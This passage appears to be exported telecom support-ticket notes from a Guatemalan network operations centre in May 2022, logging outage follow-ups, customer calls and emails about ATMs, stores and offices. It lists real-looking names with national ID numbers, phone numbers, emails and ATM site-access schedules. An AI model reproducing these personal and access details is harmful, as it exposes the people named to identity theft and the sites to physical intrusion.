CHOJOLAN CHICAJ, LUIS ALBERTO                549369          1738904660914
EN ESPERA DE SUS COMENTARIOS QUEDO ATENTO.,</t>
  </si>
  <si>
    <t>PERSONAL 5B CONFIRMA  VISITA  PARA LAS 14:00
[SOLICITUD :##RE-754244##] : COORDINACIÓN DE APERTURA F4574922 | _ATM0837 | SD1128750
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUEN DIA
PROCEDER PARA LAS 14HRS LAS LLEGADAS AL PUNTO
22284952
837
LUIS GALINDO
SERVICIOS 5B
PBX: (502) 2420-7200
DETALLE DE SOLICITUD ATENDIDA
SOLICITANTE
 JONATHAN EDUARDO TEZEN MEJIA
EMAIL
 JONATHAN.TEZENM@CLARO.COM.GT
CC
ESTADO
 EN EJECUCIÓN
ASUNTO
COORDINACIÓN DE APERTURA F4574922 | _ATM0837 | SD1128750
BUENA DÍA ESTIMADO CLIENTE
     SOLICITANDO DE SU AMABLE APOYO CON PODER GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA  VALIDAR SERVICIO EN :  F4574922 |  _ATM0837  | SD1128750
AGRADECEMOS   CONFIRMAR SI SE PUEDE REALIZAR APERTURA EL DÍA DE HOY A LAS 14:00 O SE COORDINA PARA MAÑANA A LAS 08:00
NOMBRE                                                          IBM                    DPI
JULIAN LOPEZ, JOSE DANILO                                610004            2082737511106
TUCH PACAJOC, CESAR AUGUSTO                731836          2052962891105
DONIS LÓPEZ, GERBER JOSUÉ                       550149          2086696631101
CHOJOLAN CHICAJ, LUIS ALBERTO                549369          1738904660914
EN ESPERA DE SUS COMENTARIOS QUEDO ATENTO.,</t>
  </si>
  <si>
    <t>CLIENTE RESEPONDE
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 17:22PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-753594##] : ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM0837"
BUENA TARDE INFORMANDO QUE NO HAY E.E EN EL SECTOR.
ORLANDO RAMIREZ
SERVICIOS 5BPBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 17:12PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM083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4922
ID: 47502532T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0837
UBICADO EN:  CAJERO 837 BANRURAL 6 AV. Y 5 C. Z.1 NUEVO SAN CARLOS RETALHULEU
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR APERTURA
COORDINACIÓN DE APERTURA F4574922 | _ATM0837 | SD1128750
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;;TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;Y 4 MÁS
CC:CNOCCA;GRUPO N1
MIÉ 25/05/2022 9:08
BUENA DÍA ESTIMADO CLIENTE
     SOLICITANDO DE SU AMABLE APOYO CON PODER GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA  VALIDAR SERVICIO EN :  F4574922 |  _ATM0837  | SD1128750
AGRADECEMOS   CONFIRMAR SI SE PUEDE REALIZAR APERTURA EL DÍA DE HOY A LAS 14:00 O SE COORDINA PARA MAÑANA A LAS 08:00
NOMBRE                                                          IBM                    DPI
JULIAN LOPEZ, JOSE DANILO                                610004            2082737511106
TUCH PACAJOC, CESAR AUGUSTO                731836          2052962891105
DONIS LÓPEZ, GERBER JOSUÉ                       550149          2086696631101
CHOJOLAN CHICAJ, LUIS ALBERTO                549369          1738904660914
EN ESPERA DE SUS COMENTARIOS QUEDO ATENTO.,</t>
  </si>
  <si>
    <t>F4574927</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001802799
**</t>
  </si>
  <si>
    <t>F4574966</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
8600126T || AGENCIA 88
AXEL SAMUEL LOPEZ ORTIZ
BUENOS DÍAS ESTIMADOS.
BRINDANDO SEGUIMIENTO AL INCIDENTE REPORTADO CON EL ID 8600126T, SOLICITAMOS DE SU APOYO PERMITIENDO EL INGRESO A SUS INSTALACIONES A NUESTRO PERSONAL.
ADJUNTO LOS DATOS DEL PERSONAL QUE SE HARÁ PRESENTE:
NOMBRE                                                    DPI
RODOLFO YOOL OVALLE            1626-10386-0401
YONATAN CHOCOJ TOHON        1773-461100-403
ATENTAMENTE:</t>
  </si>
  <si>
    <t>F4574973</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE, EN ESPERA DE CONFIRMACION DE PERMISOS + HORA EN CONJUNTO COON SU PROVEEDOR PARA CERTIFICACION DE SERVICIO-
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: LUNES, 23 DE MAYO DE 2022 18:22
PARA: VJIMENEZ@MDO.GT &lt;VJIMENEZ@MDO.GT&gt;; JSOTO@MDO.GT &lt;JSOTO@MDO.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN 23865757 AGRONOMICAS DE GUATEMALA, S.A. - DIAG 6 ZONA 10 10-01 C.GEREN LAS MARGARITAS TORRE I OF 1402
BUENA TARDE ESTIMADO, CON RESPECTO AL E1:
GDN 23865757
AGRONOMICAS DE GUATEMALA, S.A. -
DIAG  6 ZONA 10   10-01 C.GEREN LAS MARGARITAS TORRE I OF 1402
SOLICITO SU AMABLE APOYO PARA TRAMITAR PERMISOS HACIA NUESTRO POSIBLE PERSONAL TÉCNICO QUE ESTARÁ LLEGANDO EL DÍA DE MAÑANA 10 AM:
NOMBRE             DPI
MARLON ENRIQUE MUÑOZ             DPI: 1582 46500 1801
JOSE ALBERTO IXPATA TOJ     DPI: 1660 02313 1503
JUAN JOSE RODRIGUEZ PAZ      DPI: 2494 43260 0208
JAVIER DANILO CHETE CHAJON      DPI: 72149 40594 0103
LUIS EMILIO GONZALEZ CATALAN    DPI: 2530 48877 0101
PEDRO EDUARDO TOT MARTINEZ   DPI: 1681 34810 0101
MILTON ENRIQUE SALAZAR          DPI: 2626 48784 0101
EDWIN EDUARDO DEL CID                DPI: 1981 4 8798 0101
FAVOR SU APOYO CONFIRMANDO POR ESTE MEDIO:  HORA Y PERMISOS PARA VISITA TÉCNICA EN CONJUNTO CON SU PROVEEDOR DE PBX.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JEFRY SOTO-40273431 MENCIONA QUE ESTARA DANDO SEGUIMIENTO CON EL PROVEEDOR DE LA PBX
-ID 1001869748</t>
  </si>
  <si>
    <t>VICTOR JIMENEZ-4004443  ## CONFIRMA VISITA Y PERMISOS HACIA NUESTROS TECNICOS A LAS 10 AM ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR JIMENEZ-40044432 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001868776 - 1001869235</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR JIMENEZ-40044432 ENVIA A BUZON 2 VECS ##INTENTARA NUEVAEMENTE EN BREVE ##
1001866814
COLA:
NOMBRE: A: 40044432
NÚMERO: 55280199
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/05/2022 10:50:29
1001867407
COLA:
NOMBRE: A: 40044432
NÚMERO: 55280199
DURACIÓN: 0:00:36
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/05/2022 10:50:37</t>
  </si>
  <si>
    <t>VICTOR JIMENEZ-40044432 ---- COMENTA QUE TIENE 2 REPORTES
1. BLOQUEO HACIA INTERNACIONAL: SELE INDICA QUE DEBE ESCALARLO CON EJECUTIVO, DEBIDO A QUE ESO LLEVA COBRO- Y NOSOTROS SOMOS EL AREA DE FALLAS $$CLIENTE INDICA QUE YA ESTA ESCALADO CON EJECUTIVO
2. NO POSEE LLAMADAS SALIENTES DESDE INICIO DE AÑO ##  SE VERIFICA EN SU HISTORIAL Y SE OBSERVA QUE RECIENTEMENTE SE CERTIFICO F4530822 #SE CONSULTA SOBRE ESO A CLIENTE E INDICA QUE PROVEEDOR NO UBICO PROBLEMA EN PBX Y QUE EL PROBLEMA ESTA EN CLARO ## CON ESTE ULTIMO REPORTE, DEBIDO A QUE CLIENTE EXIGE VISITA DE CERTIFICACION ## SE LE EXIGUE QUE SU PROVEEDOR DE PBX ESTE PRESENTE, CLIENTE INDICA QUE  PROVEEDOR ESTARA CONFIRMANDO PARA VISITA TECNICA DE LAS 10 AM EL DIA DE MAÑANA Y QUE PARA CLARO, SE DEBEN TRAMITAR PERMISOS# POR LO QUE SE ENVIARA CORREO A CLIENTE PARA TRAMITAR PERMISOS + QUE CONFIRME VISITA CON SU PROVEEDOR ##VIVO</t>
  </si>
  <si>
    <t>F4574985</t>
  </si>
  <si>
    <t>SEGÚN CRONOLOGÍA DE LA FALLA  HAY QUE LLAMAR  EN 30 MINUTO EN EL CUAL SE CUMPLE Y NO HAY GESTIÓN SE LE LLAMA A JOSUE CANIZ AL 41673388  ID 1001827143 SE LE BRINDA LA INFORMACIÓN  Y YA ESTÁN DISPONIBLES SE TRANSFIERE CON EL GESTOR LUVY AL 8126 ID 1001827531 SE DEJA EN LINEA CON EL GESTOR A CARGO</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE JOSUE CANIZ, INDICANDO QUE LOS SEGMENENTOS 10.201.3.0/24 Y 10.201.4.0/24, DEBEN TENER ACCESO A AL PUNTO 807900004 EN ZONA 12, SE PROCEDE A VALIDAR A NIVEL WAN.
1001827532
COLA:
NOMBRE: DE: LUVY ESAU SANDOVAL MATEO
NÚMERO: 7753
DURACIÓN: 0:10:53
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 24/05/2022 09:22:17</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE CANIZ AL 41673388 SOLICITA QUE SE LE LLAME EN 30 MIN PARA PODER REALIZAR LAS PRUEBAS **
ID 1001815053
**</t>
  </si>
  <si>
    <t>F4575007</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001898854</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCKLIN ORELLANA 44990369 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
AUTORIZA CIRRE DE TICKET **
ID 1001906507
**</t>
  </si>
  <si>
    <t>F4575071</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ROSAS 55312227 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001900388</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO ROSAS AL 55312227 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001800235
**</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE MARCO ROSAS ID: 1001787119
COMENTA QUE VE ESTAN OPERATIVOS UNICAMENTE QUE LOS HA OBSERVADO INESTABLES, SOLICITA SE DEJEN EN MONITOREO POR 2 HRS, SE NOTIFICA A ALEJANDRO.NAVARRO VIA SKYPE PARA EL CAMBIO DE ETAPA | MONITOREO HASTA LAS 22:20 HRS | WIP</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ROSAS 55312227 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001915521</t>
  </si>
  <si>
    <t>F4575073</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE MARCO ROSAS ID: 1001787119
COMENTA QUE VE ESTAN OPERATIVOS UNICAMENTE QUE LOS HA OBSERVADO INESTABLES, SOLICITA SE DEJEN EN MONITOREO POR 2 HRS, SE NOTIFICA A SAMUEL.ESTRADAG VIA SKYPE PARA EL CAMBIO DE ETAPA | MONITOREO HASTA LAS 22:20 HRS | WIP</t>
  </si>
  <si>
    <t>F4575092</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ADOLFO GONZALEZ 41108790 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001901187</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ADOLFO GONZALEZ AL 41108790 / 50586833 NO RESPONDE AMBOS NUMEROS ENVIAN A BUZON SE INTENTARA LUEGO **
ID 1001800407- 1001800450
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ADOLFO GONZALEZ AL 41108790 - 50586833 NO RESPONDE, SE INTENTARA LUEGO **
IKD 1001860949 - 1001861093
**</t>
  </si>
  <si>
    <t>F4575117</t>
  </si>
  <si>
    <t>CLIENTE MARI DIAZ SE CONTACTA DEL 30196810 ID 1001840113 PARA EL SEGUIMIENTO DEL TICKET Y SE VALIDA QUE NO HAY ALGO PENDIENTES POR EL CLIENTE SEGÚN CRONOLOGÍA DE LA FALLA SE CONTACTA CON EL GESTOR LUVY.SANDOVAL AL 8126 ID 1001844725 SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE SE TOMEN DATOS Y SE DOCUMENTE EL LE BRINDARA EL SEGUIMIENTO SE LE BRINDA LA INFORMACION AL CL SE MUEVE A TRABAJO EN CURSO
DIRECCIÓN:  HOTEL 2 MUNDOS, MONTE RICO  83 40 ALDEA LA CURBINA ZONA 0 PLAYA F CHIQUIMULILLA SANTA ROSA LATITUD N 13
CONTACTO EN EL SITIO:  MARI DIAZ 79378500 / 30196810 ARIEL GARCIA MISMOS CONTACTOS
PERMISOS:  SOLO PRESENTAR IDENTIFICACIÓN
HORARIO DE ATENCIÓN: 06:00 A 21.00 HORAS Y PUEDE ESPERAR Y SOLICITA QUE SE CONFIRME LA VISITA Y TOMAR EN CUENTA QUE LA AFECTACION PUEDE SER PORQUE EL EQUIPO SE APAGA Y ENCIENDE SOLO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE QUIEN REPORTA, 30196810 MARI DIAZ QUIEN VALIDA SERVICIO QUE SI SE TIENE OPERATIVO EL SERVICIO SIN EMBARGO CLIENTE INDICA QUE NO ESTA SATISFECHA PORQUE SE LE DEJO UN EQUIPO MAS PEQUEÑO A EL QUE ELLA TENÍA Y QUE EN SU CONTRATO NUEVO LE PROMETIERON EL CAMBIO (QUE ES EL EQUIPO QUE SE DAÑO) TECNICO NO CONTABA CON UN EQUIPO SIMILAR POR LO MISMO SE DEJO UN CISCO1921 Y NO EL CISCO 2921
2001027456
COLA:
NOMBRE: A: 30196810
NÚMERO: 30196810
DURACIÓN: 0:16:12
ESTADO: CONECTADA
DETALLES: 30196810
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 24/05/2022 19:56:10</t>
  </si>
  <si>
    <t>F4575177</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD -***
DE: VICTOR NUNEZ (VENDOR) [MAILTO:VICTOR.NUNEZ2@WALMART.COM]
ENVIADO EL: MARTES, 24 DE MAYO DE 2022 05:31
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF LA ESPERANZA ID: 344400220
EN EFECTO, YA SE MUESTRA EL SERVICIO NORMALIZADO, POR TANTO PUEDEN CERRAR EL TIQUET.
SALUDOS CORDIALES;</t>
  </si>
  <si>
    <t>DE: VICTOR NUNEZ (VENDOR) [MAILTO:VICTOR.NUNEZ2@WALMART.COM]
ENVIADO EL: MARTES, 24 DE MAYO DE 2022 02:16
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: ENLACE CAÍDO DE DF LA ESPERANZA ID: 344400220
BUEN DÍA
FAVOR DE REVISAR EL ENLACE CAÍDO DE DF LA ESPERANZA
ID: 344400220
WAN: 22.48.3.133
DIRECCIÓN: 1RA. CALLE 5-79 ZONA 1 LA ESPERANZA, QUETZALTENANGO
DETERMINANTE: 4294
INCIDENTE INTERNO: INC28777227</t>
  </si>
  <si>
    <t>***---SE MUEVE A WP CL YA VALIDO CIERRE ---**</t>
  </si>
  <si>
    <t>F4575223</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A TELMEX PARA VALIDAR --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 24 DE MAYO DE 2022 03:24
PARA: CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMBTR000062|| ID LOCAL 42700493T || ENLACE CAÍDO
BUENOS DÍAS ESTIMADO SR. CASTAÑEDA.
                RESPECTO A SU SOLICITUD, PERSONAL A CARGO NOS COMENTA QUE EL SERVICIO SE ENCUENTRA OPERATIVO.
SE PRESENTÓ UNA AFECTACIÓN A NIVEL DE TRANSMISIÓN EN EL NODO LA CUAL YA FUE SUPERADA, PODRÍA APOYARNOS EN VALIDAR DESDE SU LADO Y CONFIRMAR SI PODRÍAMOS CERRAR VUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CASTAÑEDA CUEVAS CARLOS EMILIO [MAILTO:CCCUEVAS@UNINET.COM.MX]
ENVIADO EL: MARTES, 24 DE MAYO DE 2022 03:19
PARA: ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMBTR000062|| ID LOCAL 42700493T || ENLACE CAÍDO
ESTIMADOS,
SE TIENE ALGUNA ACTUALIZACIÓN DE ESTE TICKET.
SALUDOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174-5299 CONTESTA LA SEÑORITA KARINA RUIZ PERO DEJA LLAMADA EN ESPERA Y NO LA RETOMAN, SE INTENTARA LUEGO **
ID 1001800767
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174-5299 RESPONDE ILIANA MENCIONA QUE EL TICKET INTERNO YA ESTA CERRADO
-ID 1001818793 - 1001818404</t>
  </si>
  <si>
    <t>F4575238</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM DE LA CRUZ AL 36210350 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001801433
**</t>
  </si>
  <si>
    <t>F4575249</t>
  </si>
  <si>
    <t>SE TIENE EL CONTACTO EL PR FRANCISCO RODRIGUEZ AL 30337011 ID 1001859095 ATIENDE Y SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE YA ESTA OPERATIVO Y SE PUEDE PROCEDER CON EL CIERRE DEL TICKET. SE NOTIFICA AL GESTOR RAMOS.MARLON EL CIERRE DE LA FALLA VIA SKYPE</t>
  </si>
  <si>
    <t>F4575378</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 QUIEN COLOCA EN CONFERENCIA A PR, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001909920</t>
  </si>
  <si>
    <t>F4575474</t>
  </si>
  <si>
    <t>SE CONTACTA A EL PR BRAULIO MIRANDA AL 77940350 ID 1001861186 ATIENDE ADRIAN PEREZ Y SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE YA LO VEN OPERATIVO, SE PROCEDE CON EL CAMBIO DE ESTADO Y SE LE NOTIFICA AL GESTOR JURGEN.BOCH VIA SKYPE PROCEDER CON EL CIERRE DE TICKET CON LA SD</t>
  </si>
  <si>
    <t>F4575484</t>
  </si>
  <si>
    <t>SE TIENE EL CONTACTO EL PR ANTONIO RIVERA AL 59296504 ID 1001864786 ATIENDE  Y SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE LA RED YA SE RESTABLECIÓ POR TAL RAZÓN SE PROCEDE CON EL CIERRE DE LA FALLA Y AUTORIZA CIERRE DE TICKET SE NOTIFICA AL GESTOR JURGEN.BOCH VIA SKYPE</t>
  </si>
  <si>
    <t>F4575487</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA NOTIFICAR
JUAN PABLO MORALES BARRONDO
MAR 24/05/2022 4:42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634¿¿¿¿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5487¿¿
ID: 47502148T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1634
UBICADO EN:
CARRETERA AL ATLANTICO 0-006 BASE MILITAR MARISCAL ZABALA ZONA 17, GUATEMALA, AREA DE RESTAURANTES.
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4575494</t>
  </si>
  <si>
    <t>***-- CL CONFIRMA ACCESO PARA LAS 08:00 HRS --** *
DE: MALAQUIAS PANJOJ (VENDOR) [MAILTO:MALAQUIAS.PANJOJ@WALMART.COM]
ENVIADO EL: MIÉRCOLES, 25 DE MAYO DE 2022 04:20
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF SONAGUERA ID: 636345
BUENOS DÍAS;
PUEDEN PROCEDER CON LA VISITA A PARTIR DE LAS 08:00 HRS. ACCESO FUE SOLICITADO VÍA CORREO A LAS PERSONAS GENESIS MARIELA SAAVEDRA AGUILAR Y JOSE DE LA PAZ NUÑEZ.
SALUDOS!</t>
  </si>
  <si>
    <t>F4575495</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUÉ DAVID CANÍZ GUERRERO AL 2378 3900 EXT. 12344 INDICA QUE YA ESTAN LOS PERMISOS CONFIRMADOS **
ID 1001933792
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUÉ DAVID CANÍZ GUERRERO AL 2378 3900 EXT. 12344 INDICA QUE AUN PRESENTA LENTITUD || SE NOTIFICA A GESTOR **
ID 100851523
**</t>
  </si>
  <si>
    <t>SE TIENE EL CONTACTO EL PR EVELYN RAMIREZ RAMOS AL 30323193 ID 1001867728 ATIENDE Y SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE AL PARECER ES EL ROUTER Y SOLICITA CAMBIO O LO VERIFIQUEN SE CONTACTA CON EL GESTOR  A CARGO JOSE.OCHOA AL 816 ID 1001868153 ATIENDE YENSI.CALGUA Y TRASNFIERE CON EL GESTOR PERO CORTA LA COMUNICACIÓN
ID: 1001868153
NOMBRE: A: YENSI SUCELY CALGUA MATEO
NÚMERO: 5321
DURACIÓN: 0:00:59
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: GUSTAVO.BARAHONA
FECHA: 24/05/2022
HORA: 10:52:34
SE LLAMA NUEVAMENTE AL 8126  ID 1001868801 DONDE ATIENDE DARWIN Y SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE BRINDARA EL APOYO, SE DEJA CON EL PR EN LINEA</t>
  </si>
  <si>
    <t>F4575497</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RUBEN MEMBREÑO AL 94386804  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001826399
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAMANTA ROMERO AL 24436087 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001825887
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAMANTA ROMERO AL 24436087 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001812688 - 1001813050
**</t>
  </si>
  <si>
    <t>F4575521</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ERNESTO ORTIZ 71897323 NO SE ENCUENTRA EN SITIO PERO SOLICITO VALIDAR EQUIPOS ENCENDIDOS Y APLICAR REINICIO, ENLACE CONTINUA DOWN.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ERNESTO ORTIZ 24404266 NO CONTESTA IVR ENVIA A BUZON, ID: 1001809916.</t>
  </si>
  <si>
    <t>F4575525</t>
  </si>
  <si>
    <t>TECNICOS EN REPARACION DE FIBRA</t>
  </si>
  <si>
    <t>SE DETIENE ESCALACIONES CORTE OCACIONADO POR CLIENTE</t>
  </si>
  <si>
    <t>153: BYTES=56 SEQUENCE=418 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=419 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=420 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=421 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=422 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=423 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=424 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=425 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=426 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=427 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=428 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=429 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=430 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=431 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=432 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=433 TTL=255 TIME=1 MS
